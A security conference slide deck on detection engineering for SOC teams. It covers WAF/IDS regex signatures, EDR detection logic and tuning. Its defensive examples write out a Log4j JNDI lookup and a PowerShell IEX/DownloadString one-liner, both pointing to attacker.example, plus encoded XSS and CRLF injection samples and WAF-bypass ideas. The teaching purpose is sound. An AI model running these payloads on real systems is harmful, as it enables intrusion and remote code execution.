1 of 20

Detection Engineering for SOC

Sunil Kumar BV | Sr Security Engineer | Rakuten

“Everything published, presented and/or discussed in this conference is solely based on my personal point of view and does not represent my current or past employers.”

2 of 20

Next 40 Mins !

SOC Detection concept
Detection Logic in WAF/IDS
- Workflow
- HTTP Header: L7 data fields
- Regular expressions
- Example
Detection Logic in EDR
- Detection focus based on Kill chain and Data collection details
- Different OS Binaries
- ATT&CK techniques count per Data Source
- Example
Q&A

3 of 20

SOC Detections Concept

4 of 20

IDS and WAF Workflow example

Stage 1: Parse the HTTP(S) packet from the client
(HTTP request and response logs)

Stage 2: Choose the rule set depending on the type of incoming parameters

Packet decode, HTTP fields

Stage 3: Normalize data
Packet grouping

Stage 4: Apply detection logic
Regular expression based (signatures/rules/patterns)

Stage 5: Make the detection decision
An alert/offence is triggered based on true/false/score
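
The five stages above can be sketched as a small pipeline. This is only an illustration and not how any particular IDS/WAF is implemented: the function names, the two rule sets, the weights and the score threshold are all assumptions made for the example.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote_plus

# Hypothetical rule sets: (rule name, compiled signature, score weight).
RULE_SETS = {
    "query": [("xss-script-tag", re.compile(r"<script", re.IGNORECASE), 5)],
    "body": [("sqli-union-select", re.compile(r"union\s+select", re.IGNORECASE), 5)],
}
ALERT_THRESHOLD = 5  # assumed score at which an alert is raised


def parse_request(raw_request: str) -> dict:
    """Stage 1: split a raw HTTP request into request line, headers and body."""
    head, _, body = raw_request.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, uri, _version = request_line.split(" ", 2)
    headers = dict(line.split(": ", 1) for line in header_lines if ": " in line)
    return {"method": method, "uri": uri, "headers": headers, "body": body}


def choose_rule_sets(request: dict) -> dict:
    """Stage 2: pick rule sets based on which parameters are present."""
    selected = {}
    if urlsplit(request["uri"]).query:
        selected["query"] = RULE_SETS["query"]
    if request["body"]:
        selected["body"] = RULE_SETS["body"]
    return selected


def normalize(request: dict) -> dict:
    """Stage 3: decode values so that the rules see a canonical form."""
    query = urlsplit(request["uri"]).query
    params = " ".join(value for _, value in parse_qsl(query))
    return {"query": params, "body": unquote_plus(request["body"])}


def detect(raw_request: str) -> dict:
    request = parse_request(raw_request)
    rule_sets = choose_rule_sets(request)
    data = normalize(request)
    score, hits = 0, []
    # Stage 4: apply the regex signatures to the normalized data.
    for part, rules in rule_sets.items():
        for name, pattern, weight in rules:
            if pattern.search(data[part]):
                score += weight
                hits.append(name)
    # Stage 5: decide based on the accumulated score.
    return {"alert": score >= ALERT_THRESHOLD, "score": score, "hits": hits}


sample = (
    "GET /search?q=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1\r\n"
    "Host: example.test\r\n\r\n"
)
result = detect(sample)
print(result)
```

Real products differ mainly in stages 3 and 5: how aggressively they normalize input and whether they decide on a single match or on a cumulative score.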

5 of 20

HTTP Header (under L7 data)

Layer 7 (or the application layer) is the highest layer in the OSI model of network communication. It's responsible for providing network services to application processes running on a host like web browsers, email clients and file-sharing programs.

Most user-facing protocols and applications like HTTP, FTP and SMTP operate on layer 7.

The list below is not exhaustive: IDS/WAF products expose many more fields,
and different vendors use a number of different approaches (scoring etc.).

HTTP Related Fields	Files related	Email Related	TCP/UDP DOS related
http-req-cookie	file-data	pop3-req-protocol-payload	tcp-context-free
http-req-headers	file-elf-body	pop3-rsp-protocol-payload	udp-context-free
http-req-message-body	file-flv-body	imap-req-cmd-line
http-req-host-ipv4-address-found	file-html-body	imap-req-first-param	unknown-req-tcp-payload
http-req-host-ipv6-address-found	file-java-body	imap-req-params-after-first-param	unknown-rsp-tcp-payload
http-req-host-header	file-mov-body	imap-req-protocol-payload
http-req-mime-form-data	file-office-content	imap-rsp-protocol-payload	unknown-req-udp-payload
http-req-ms-subdomain	file-pdf-body	email-headers	unknown-rsp-udp-payload
http-req-origin-headers	file-riff-body
http-req-params	file-swf-body
http-req-uri	file-tiff-body
http-req-uri-path	file-unknown-body
http-req-user-agent-header	ftp-req-params
http-rsp-headers	ftp-req-protocol-payload
http-rsp-non-2xx-r	ftp-rsp-protocol-payload
http-rsp-reason	ftp-rsp-banner
http-req-method	ftp-rsp-message

6 of 20

Regular expression…

...is a sequence of characters that defines a search pattern.

IDS and WAF products use regex for their detection logic (it is how the signatures/rules/patterns are written).
Easily understandable: human-friendly to read.
Simply a string built from different syntax elements and wildcards, which helps in finding a sub-string in the source text.

Example pattern, annotated:
Case-insensitive
Search for an opening bracket followed by "script"
Anything after the string
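
The pattern these three annotations describe is not captured in the text, so the snippet below reconstructs one plausible form of it. The exact expression `(?i)<script.*` is an assumption, not the pattern from the original slide.

```python
import re

# Assumed pattern reconstructed from the three annotations:
#   (?i)     -> case-insensitive
#   <script  -> opening bracket followed by "script"
#   .*       -> anything after that string (up to the end of the line)
SCRIPT_TAG = re.compile(r"(?i)<script.*")

samples = [
    "q=<ScRiPt>alert(1)</script>",
    "q=hello world",
]
matches = [bool(SCRIPT_TAG.search(s)) for s in samples]
print(matches)
```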

Most regexes in IDS/WAF are written as signature sets for injection attacks such as SQLi, LDAP, header, code and OS command injection, and XSS, cross-site scripting (Nuclei scan), etc.

Attackers are able to find potential ways to bypass IDS/WAF; these are bugs or "weak places" in regular expressions:

https://github.com/attackercan/regexp-security-cheatsheet and https://www.slideshare.net/slideshow/lie-tomephd2013/21958607#35

ReDoS: rule set bypassing
HTTP Parameter Pollution
Double URL encoding
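
As an illustration of the double URL encoding bypass, the sketch below shows a signature missing a payload after a single decoding pass and catching it once the value is decoded until it stops changing. The signature, the helper name `decode_fully` and the round limit are assumptions made for the example.

```python
import re
from urllib.parse import unquote

SIGNATURE = re.compile(r"<script", re.IGNORECASE)


def decode_fully(value: str, max_rounds: int = 5) -> str:
    """Repeatedly URL-decode until the value stops changing (bounded)."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


# "<script>alert(1)</script>" URL-encoded twice.
payload = "%253Cscript%253Ealert(1)%253C%252Fscript%253E"

single_pass_hit = bool(SIGNATURE.search(unquote(payload)))
normalized_hit = bool(SIGNATURE.search(decode_fully(payload)))
print(single_pass_hit, normalized_hit)
```

The bound on decoding rounds keeps the normalization step itself from becoming a resource problem on deeply nested input.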

Mitigation: Precompile regex patterns where possible to improve performance.

Use a DAT (Dynamic Analysis Tool) to check and fuzz the regex patterns you create; this helps verify input validation, input limits, regex timeouts and resource limits.

Ex: https://redosdetector.com/
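
A very small version of such a dynamic check can be written by hand: precompile the pattern, feed it inputs of growing length and record how long each search takes. The pattern `^(a+)+$` is a textbook example of nested quantifiers and is used here only as an assumption; the standard `re` module has no timeout option, so the input sizes are kept small on purpose.

```python
import re
import time


def time_pattern(pattern: str, inputs: list) -> list:
    """Return (input length, matched?, seconds) for each input."""
    compiled = re.compile(pattern)  # precompile once, reuse for every input
    results = []
    for text in inputs:
        start = time.perf_counter()
        matched = compiled.search(text) is not None
        results.append((len(text), matched, time.perf_counter() - start))
    return results


# Inputs that almost match: a run of "a" followed by a character that forces
# the engine to backtrack through every way of splitting the run.
evil_inputs = ["a" * n + "!" for n in range(10, 19, 2)]
report = time_pattern(r"^(a+)+$", evil_inputs)

for length, matched, seconds in report:
    print(f"len={length:2d} matched={matched} time={seconds:.4f}s")
```

If the time grows sharply with each small increase in input length, the pattern is a ReDoS candidate and should be rewritten or guarded by an input length limit.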

7 of 20

How can these be used in our Environment:

- Understanding what to detect?

Select an adversarial technique to detect (planning)
Proof of concept
Research the underlying technology (hypothesis creation)

- Understanding how to detect?

Identify data sources (data and log selection)
Build the detection (implementation)
Correlate with other log sources

- Peer review (continuous testing and Validation)

- Submit detection into the pipeline (towards Production)

8 of 20

Example of writing these patterns/signatures for detection:

Details of a recent attack: https://blog.orange.tw/posts/2024-08-confusion-attacks-en/

Confusion Attacks:

Filename Confusion
DocumentRoot Confusion
Handler Confusion

Exploiting Hidden Semantic Ambiguity in Apache HTTP Server!

CVE-2023-38709 - Apache HTTP Server: HTTP response splitting

https://bugzilla.redhat.com/show_bug.cgi?id=2273491

Faulty input validation in the core of Apache allows malicious or exploitable backend/content generators to split HTTP responses.
Acknowledgements: finder: Orange Tsai (@orange_8361) from DEVCORE
CR + LF → used as a new line character in Windows (Carriage Return + Line Feed, \r\n). HTTP also uses it to terminate each header line, which is why an injected CR + LF can start a new header.

http-req-cookie contains "\r\nContent-Length:" <case-insensitive> AND http-req-URL contains "cURL" <case-insensitive>
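
The rule above can be mirrored in a few lines of Python to test it against sample events. This is a sketch under assumptions: the event is a plain dictionary keyed by the field names used in the rule, and the URL-decoding of the cookie before matching is an extra normalization step that is not part of the rule as written.

```python
from urllib.parse import unquote


def matches_response_splitting_rule(fields: dict) -> bool:
    """Evaluate the two case-insensitive 'contains' conditions of the rule."""
    # Assumption: decode %0d%0a so encoded CR/LF is treated like raw CR/LF.
    cookie = unquote(fields.get("http-req-cookie", "")).lower()
    url = fields.get("http-req-URL", "").lower()
    return "\r\ncontent-length:" in cookie and "curl" in url


suspicious = {
    "http-req-cookie": "id=1%0d%0aContent-Length: 0",
    "http-req-URL": "/cURL/test",
}
benign = {
    "http-req-cookie": "id=1; theme=dark",
    "http-req-URL": "/cURL/test",
}
print(matches_response_splitting_rule(suspicious))
print(matches_response_splitting_rule(benign))
```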

9 of 20

Log4J: CVE-2021-44228

It is an RCE vulnerability in Apache Log4j 2.0 through 2.14.1. An attacker exploits it by submitting an exploit string as part of the HTTP headers sent to a vulnerable server; the server then requests a malicious payload from an attacker-controlled server through the Java Naming and Directory Interface (JNDI) over a variety of services, such as Lightweight Directory Access Protocol (LDAP).

POC: https://www.trendmicro.com/ja_jp/devops/22/a/detect-log4j-vulnerabilities.html

See also the threat classification:

http://projects.webappsec.org/w/page/13246978/Threat%20Classification

http-req-headers contains "${jndi:" <case-insensitive> OR http-req-headers contains "${jndi:ldap" <case-insensitive> OR (http-req-headers contains "${jndi:ldap" <case-insensitive> AND http-req-headers contains "\b[a-zA-Z0-9-]+\.[a-zA-Z]{2,}\b")
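
A minimal Python sketch of this kind of header check is shown below. The JNDI lookup string has the form `${jndi:<protocol>://<host>/...}`; the list of protocols, the function name and the sample headers are assumptions made for the example, and the domain regex is the one from the rule above.

```python
import re

# Literal JNDI lookup with a few protocols an exploit can use (assumed list).
JNDI_LOOKUP = re.compile(r"\$\{jndi:(?:ldap|ldaps|rmi|dns)://", re.IGNORECASE)
DOMAIN = re.compile(r"\b[a-zA-Z0-9-]+\.[a-zA-Z]{2,}\b")


def scan_headers(headers: dict) -> list:
    """Return (header name, contains a domain?) for every header with a lookup."""
    findings = []
    for name, value in headers.items():
        if JNDI_LOOKUP.search(value):
            findings.append((name, bool(DOMAIN.search(value))))
    return findings


headers = {
    "User-Agent": "${jndi:ldap://attacker.example/a}",
    "Accept": "*/*",
}
findings = scan_headers(headers)
print(findings)
```

A literal match like this is easy to evade with nested lookups such as `${${lower:j}ndi:...}`, so it should be treated as a starting point and tested against obfuscated variants.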

10 of 20

Detection Logic in EDR

- IOCs change easily.

- We should concentrate on Tactics, Techniques and Procedures (TTPs)

How the adversary goes about accomplishing their mission from reconnaissance all the way through data exfiltration and at every step in between

What exactly to look at:

In the example, the technique used is credential dumping and one of its procedures is shown, but is that enough, or do we need to do atomic testing?
What happens when the adversary uses a new procedure: will our alarms still work or not?

11 of 20

Detection Focus (based on Kill chain)

Reconnaissance: attackers scan the environment. At most we can block an IP or segment, but they can change it quickly before the attack.
Weaponization: we cannot catch the attackers here, as they build their payload in their own environment, where we have no access or logs.
Delivery/Exploitation: these are addressed by our vendor products, such as firewalls and email gateways.
Installation and C2: this is where detection engineering activity can focus. Once files (macros, PowerShell, etc.) from any process or object get in, we can check for possible alerting in the environment.
Action on Objectives: fine-tune the detections/rule set based on organizational requirements to reduce FP fatigue.
Impact: so that we can catch the adversary before potential impact.

Data collections:

- Type of Data collected?

- Where is it stored?

- Is it ingested to SIEM, EDR or not?

- Prioritizing data sources based on expenses.

- Gap analysis on Data sources and ingested data.

12 of 20

MITRE Framework

MITRE ATT&CK can be overwhelming.
Navigator: https://mitre-attack.github.io/attack-navigator/
We need to scope the attack vectors as below, basically filtering based on requirement:
- Filter by platform in the layer controls (Linux, Windows, macOS, etc.)

- Then look for particular items under the selection controls: threat group, data sources

- Select unannotated (technique/task not applicable) and

- Then toggle the state and hide (eyeball) the rest.

13 of 20

adversaries leverage Scripts

OS Binaries are local to their OS, but these binaries have been utilized and exploited by cyber criminals and crime groups to camouflage their malicious activity.

We can look at the categories of OS binaries:

1. Windows OS built-in binaries - Living Off The Land Binaries, Scripts and Libraries (LOLBAS) - https://lolbas-project.github.io/api/lolbas.csv
This file contains every LOLBAS entry in a single file, broken down by LOLBAS file and command
LOLBAS are often Microsoft-signed binaries
They can be used for a range of attacks, from executing code to performing file operations (downloading, uploading, copying, etc.).

2. macOS built-in binaries - Living Off the Orchard (LOOBins) - https://www.loobins.io/binaries/ PyLOOBins is a Python SDK and command-line utility for programmatically interacting with LOOBins - https://www.loobins.io/docs/api/pyloobins/

3. Unix OS built-in binaries - GTFOBins is a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems https://gtfobins.github.io/ https://github.com/GTFOBins

Server-side exploits - https://sploitify.haxx.it/
Windows/AD environments - https://wadcoms.github.io/
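
One way to use such a list is to turn it into a watchlist of binary names and compare it against the image file name of each process event. The sketch below works on a small inline sample rather than the real file; the column names `Filename` and `Command` and the two sample rows are assumptions and should be checked against the actual CSV before use.

```python
import csv
import io

# Inline sample standing in for a downloaded CSV (assumed columns and rows).
SAMPLE_CSV = '''Filename,Command
Certutil.exe,certutil.exe -urlcache -f {REMOTEURL} {PATH}
Bitsadmin.exe,bitsadmin /create 1
'''


def load_watchlist(csv_text: str) -> set:
    """Build a lower-cased set of binary names from the CSV text."""
    reader = csv.DictReader(io.StringIO(csv_text))
    return {row["Filename"].lower() for row in reader}


def is_lolbin(image_file_name: str, watchlist: set) -> bool:
    """Compare only the base name of the process image against the watchlist."""
    base = image_file_name.replace("\\", "/").rsplit("/", 1)[-1]
    return base.lower() in watchlist


watchlist = load_watchlist(SAMPLE_CSV)
print(is_lolbin(r"C:\Windows\System32\certutil.exe", watchlist))
print(is_lolbin(r"C:\Windows\System32\notepad.exe", watchlist))
```

A name match alone is noisy because these binaries also run legitimately, so it is best combined with command-line and parent-process conditions.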

14 of 20

ATT&CK techniques count per Data Source

We can see that Command Execution and Process Creation are the data sources with the highest technique counts.

DeTT&CT - a framework for mapping data source and detection coverage to MITRE ATT&CK

Based on this, we can prioritize our data collection to address ATT&CK techniques and sub-techniques, and collect Sysmon, Linux, server and other logs accordingly.

15 of 20

EDR Fields

These are some of the most used data fields associated with events. Fields that begin with lowercase letters are present in all events.
The agents that collect the data provide many more fields.

timestamp	FilePath
_time	GrandParentImageFilePath
HostID	ParentImageFilePath
event_platform	FileWrittenFlags
event_Name
ComputerName	DetectId
	DetectName
OriginalFilename	DetectDescription
FileName
ImageFileName	CommandLine
GrandParentFileName	ParentCommandLine
BaseFileName	GrandparentCommandLine
TargetFileName
ContextBaseFileName	RegType
	RegistryPath
SHA256HashData	RegNumericValue
DomainName	RegStringValue
HostURL	RegBinaryValue

16 of 20

Example: Detecting malicious PowerShell command execution

PowerShell is a built-in command-line tool. It can download and execute code from another system and provides unprecedented access on Windows computers.

Its malicious use is often not stopped or detected by traditional endpoint defenses, as files and commands are not written to disk. This means fewer artifacts to recover for forensic analysis.

Several offensive tools are built on or use PowerShell, including Invoke-Mimikatz.

POC: https://book.hacktricks.xyz/windows-hardening/basic-powershell-for-pentesters

- Further tuning may be needed based on which process executed the command (the parent process) and whether that parent is legitimate or unknown, etc.

Condition 1: ((CommandLine contains "powershell.exe -exec" AND CommandLine contains "bypass") AND (CommandLine contains "IEX (" OR CommandLine contains "Invoke-Expression") AND
CommandLine contains ".DownloadString" AND CommandLine contains "\b[a-zA-Z0-9-]+\.[a-zA-Z]{2,}\b" AND reffererURL contains "\b[a-zA-Z0-9-]+\.[a-zA-Z]{2,}\b")
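
Condition 1 can be prototyped in Python before it is written in the EDR's own query language. The sketch below makes two deliberate changes, both assumptions: the domain regex is applied only to the host part of a URL found in the command line (applied to the whole command line it would also match strings such as powershell.exe), and the reffererURL clause is left out because it belongs to a separate field.

```python
import re

DOMAIN = re.compile(r"\b[a-zA-Z0-9-]+\.[a-zA-Z]{2,}\b")
URL_HOST = re.compile(r"""https?://([^/'"\s)]+)""", re.IGNORECASE)


def condition_1(command_line: str) -> bool:
    """Evaluate the CommandLine part of Condition 1 (case-insensitive)."""
    cmd = command_line.lower()
    launches_with_bypass = "powershell.exe -exec" in cmd and "bypass" in cmd
    evaluates_string = "iex (" in cmd or "invoke-expression" in cmd
    downloads = ".downloadstring" in cmd
    hosts = URL_HOST.findall(command_line)
    has_domain = any(DOMAIN.search(host) for host in hosts)
    return launches_with_bypass and evaluates_string and downloads and has_domain


suspicious = (
    "powershell.exe -exec bypass -c "
    "\"IEX (New-Object Net.WebClient).DownloadString('http://attacker.example/a.ps1')\""
)
benign = "powershell.exe -NoProfile Get-ChildItem"

print(condition_1(suspicious))
print(condition_1(benign))
```

Substring conditions like these are sensitive to spacing, abbreviated parameters and encoded commands, so the prototype is best run against a set of known variants before it goes to peer review.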

17 of 20

Processing Directions:

Step 1: Collect the commands/scripts and their variable details:

Step 2:

In the same way, we can try other commands and processes, such as:

nltest ***
net config ***
Run cmd ***

18 of 20

Fine-tuning Practices

- Continuous improvement and development
  Use version control to keep and monitor changes.

- Inefficient alerts need to be fixed
  Update the logic
  Add new functionality such as enrichment or correlation

Reviewing alerts periodically
- Number of alerts/offences
- Number of FP, benign TP, TP
- Event-to-alert time difference
- Syslog or EDR agent fields
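
The review metrics above are straightforward to compute once alerts carry a verdict and two timestamps. The record layout, the verdict labels and the sample values below are hypothetical and only serve to show the arithmetic.

```python
from datetime import datetime
from statistics import mean

# Hypothetical alert records for one detection over a review period.
alerts = [
    {"verdict": "TP", "event_time": "2024-09-01T10:00:00", "alert_time": "2024-09-01T10:02:00"},
    {"verdict": "FP", "event_time": "2024-09-01T10:05:00", "alert_time": "2024-09-01T10:06:00"},
    {"verdict": "BTP", "event_time": "2024-09-01T11:00:00", "alert_time": "2024-09-01T11:03:00"},
    {"verdict": "FP", "event_time": "2024-09-01T12:00:00", "alert_time": "2024-09-01T12:02:00"},
]


def summarize(records: list) -> dict:
    """Count verdicts and compute FP rate and mean event-to-alert delay."""
    total = len(records)
    by_verdict = {
        verdict: sum(r["verdict"] == verdict for r in records)
        for verdict in ("TP", "BTP", "FP")
    }
    delays = [
        (
            datetime.fromisoformat(r["alert_time"])
            - datetime.fromisoformat(r["event_time"])
        ).total_seconds()
        for r in records
    ]
    return {
        "total": total,
        "by_verdict": by_verdict,
        "fp_rate": by_verdict["FP"] / total,
        "mean_delay_seconds": mean(delays),
    }


summary = summarize(alerts)
print(summary)
```

Tracking these numbers per detection over time makes it easier to decide which rules need new logic, enrichment or retirement.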

19 of 20

References:

WAF detection logic: https://www.blackhat.com/docs/us-16/materials/us-16-Ivanov-Web-Application-Firewalls-Analysis-Of-Detection-Logic.pdf
Detection Engineers Unveile - Detection engineering: https://sansorg.egnyte.com/dl/dHTAZ46hAz
http-headers parameter details: https://docs.paloaltonetworks.com/pan-os/u-v/custom-app-id-and-threat-signatures/custom-application-and-threat-signatures/custom-signature-contexts/string-contexts/http-req-headers
DavidJBianco: https://detect-respond.blogspot.com/2013/03/the-pyramid-of-pain.html
Christopher Peacock: https://scythe.io/library/summiting-the-pyramid-of-pain-the-ttp-pyramid
Malware Analysis For Hedgehogs: https://struppigel.blogspot.com/2017/07/process-injection-info-graphic.html
WAF Bypass: https://owasp.org/www-chapter-frankfurt/assets/slides/21_OWASP_Frankfurt_Stammtisch.pdf

20 of 20

Anybody got any

Questions?